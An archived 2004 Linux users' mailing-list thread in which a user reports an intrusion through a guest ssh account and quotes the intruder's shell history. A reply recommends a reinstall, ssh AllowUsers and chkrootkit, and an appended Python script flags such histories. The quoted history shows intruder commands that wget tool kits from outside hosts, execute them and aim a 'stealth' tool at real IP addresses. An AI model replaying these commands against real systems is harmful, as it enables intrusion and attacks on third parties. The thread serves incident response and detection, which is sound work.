Re: [SLUG] Someone in my computer

From: Ed Centanni (ecentan1@tampabay.rr.com)
Date: Tue Aug 24 2004 - 19:12:27 EDT


Once you wipe out the system and re-install fresh (highly recommended to
remove any potential traces of rooting), you may want to add a line to
/etc/sshd_config, something like this:

AllowUsers user1 user2

where user1 and user2 are the ONLY users you want to allow ssh access
to. Make sure these users have good passwords or, better still, set up
public/private keys for automated authentication.

See man sshd and man ssh for details.

Also get chkrootkit http://www.chkrootkit.org and run it periodically.

Ed.

Tevfik Yucek wrote:

> Hi all,
>
>
> Last night I realized there was someone in my computer, Slackware 10.
> I have a sshd running and he/she/it connected to my computer and
> executed the following commands.
>
> I am usually not concerned with security and did not care much
> until yesterday. I had a guest "user" account with password "guest"
> and he/she/it used it.
>
> So, here are my questions:
> - how does he/she/it know about my IP, how did they know I was
> using Linux, and how did he/she/it get the password? Just guessing?
> - how can I kick a user if I notice that I have an uninvited
> visitor? I had to stop the internet connection of my computer.
> - what do the commands below do, and should I do something about
> them?
>
>
> Thanks,
> Tevfik
>
> Here are the commands:
>
> passwd
> cat /etc/issue
> cd /tmp
> mdkri .src
> cd .src
> mkdir .src
> cd .src
> wget carmelo.go.ro/do.tgz
> tar zxvf do.tgz
> rm -rf do.tgz
> ./do
> ./do
> wget 0kas.com/prt.tgz
> tar zxvf prt.tgz
> ./x
> ./x
> ./x
> ./x
> ./x
> ./x
> wget stefang.com/prostii/n
> chmod +x n
> ./n
> ./n
> ./n
> ./n
> ./n
> ./n
> ./n
> ./n
> ./n
> ./n
> ls
> ./n
> ./x
> ./x
> ./x
> wget yahaa.at/p/90
> ./90
> chmod +x 90
> ./90
> ./90
> wget 0kas.com/Florin/flood.tar.gz
> tar zxvf flood.tar.gz
> rm -rf flood.tar.gz
> ls
> rm -rf prt.tgz
> ls
> rm -rf prt.tgz
> cd belea
> ./stealth 218.38.3.83 53
> cd /tmp/.src/belea
> ./stealth 80.97.245.241 53
>
>
> ./stealth
> ^[[A
>
> w
> cd /tmp/.src
> cd belea
> ./steath 82.208.160.155 53
> ./steath 82.208.160.155 53
> ./steath 82.208.160.155 53
> ./stealth 82.208.160.155 53
> ./stealth 82.208.160.155 53
> export PATH="."
> bash
> cd /tmp/.src/belea
> w
> w
> cat psybnc.conf
> locate psybnc.conf
> ./stealth 213.154.149.199 53
> w
> ./stealth 213.233.97.53 53
> ./stealth 194.105.27.21 80
> ./stealth 81.196.147.218 53
> ./stealth 81.196.59.83 80
> ./stealth 81.196.59.83 53
> cd /tmp/.src
> cd belea
> ./stealth 80.96.146.171 53
> cd /tmp/ .scr/belea
> ./stealth 81.196.147.170 53
> ./stealth 81.196.147.170 55
> ./stealth 81.196.147.170 53
> ./stealth 211.47.141.43 53
> cd .src
> ce belea
> cd belea
> ./stealth 211.47.141.43
> ./stealth 211.47.141.43 53
> ./stealth 211.47.141.43 53
> w

-----------------------------------------------------------------------
This list is provided as an unmoderated internet service by Networked
Knowledge Systems (NKS). Views and opinions expressed in messages
posted are those of the author and do not necessarily reflect the
official policy or position of NKS or any of its employees.
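As an added illustration (not from either poster), a small Python triage script that reads a captured shell history like the one quoted above and flags what a defender looks for: OS enumeration, hidden directories under /tmp, payload downloads, dropped files being made executable and run, a PATH="." hijack, and an IRC bouncer config. The rule names are the example's own, and the sample history is a constructed excerpt of the quoted one.

```python
import re
from collections import Counter

# Constructed sample: a short excerpt of the history quoted in the thread.
HISTORY = """cat /etc/issue
cd /tmp
mkdir .src
cd .src
wget carmelo.go.ro/do.tgz
tar zxvf do.tgz
./do
wget stefang.com/prostii/n
chmod +x n
./n
export PATH="."
cat psybnc.conf
./stealth 218.38.3.83 53
./stealth 80.97.245.241 53
./stealth 218.38.3.83 53
""".splitlines()

# What a defender flags when reading a compromised account's shell history.
RULES = {
    "recon": re.compile(r"^cat\s+/etc/(issue|passwd)"),           # OS/user enumeration
    "hidden_dir": re.compile(r"^(mkdir|cd)\s+(/tmp/)?\.\S+"),      # dot-dirs under /tmp
    "download": re.compile(r"^(wget|curl)\s+(\S+)"),               # remote payload fetch
    "make_exec": re.compile(r"^chmod\s+\+x\s+"),                   # marking a download executable
    "run_local": re.compile(r"^\./(\S+)(?:\s+(\d{1,3}(?:\.\d{1,3}){3})\s+(\d+))?"),  # running dropped files
    "path_hijack": re.compile(r"^export\s+PATH=[\"']?\."),         # PATH="." shadows system binaries
    "bouncer_conf": re.compile(r"psybnc\.conf"),                   # IRC bouncer config, typical of these kits
}

def triage_history(lines):
    """Count rule hits and pull out hosts, executed files and host:port targets."""
    hits, hosts, binaries, targets = Counter(), set(), set(), Counter()
    for line in (l.strip() for l in lines):
        for name, rx in RULES.items():
            m = rx.search(line)
            if not m:
                continue
            hits[name] += 1
            if name == "download":          # host part of the URL, scheme stripped
                hosts.add(re.sub(r"^\w+://", "", m.group(2)).split("/")[0])
            elif name == "run_local":
                binaries.add(m.group(1))
                if m.group(2):              # dropped tool pointed at an IP and port
                    targets[(m.group(2), m.group(3))] += 1
    return {"hits": dict(hits), "download_hosts": sorted(hosts),
            "executed": sorted(binaries), "targets": dict(targets)}
```

Run it as triage_history(HISTORY); the download hosts and executed files are the artifacts to pull off the box before wiping it, and the host/port pairs are what to look for in outbound connection logs.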



This archive was generated by hypermail 2.1.3 : Fri Aug 01 2014 - 15:18:37 EDT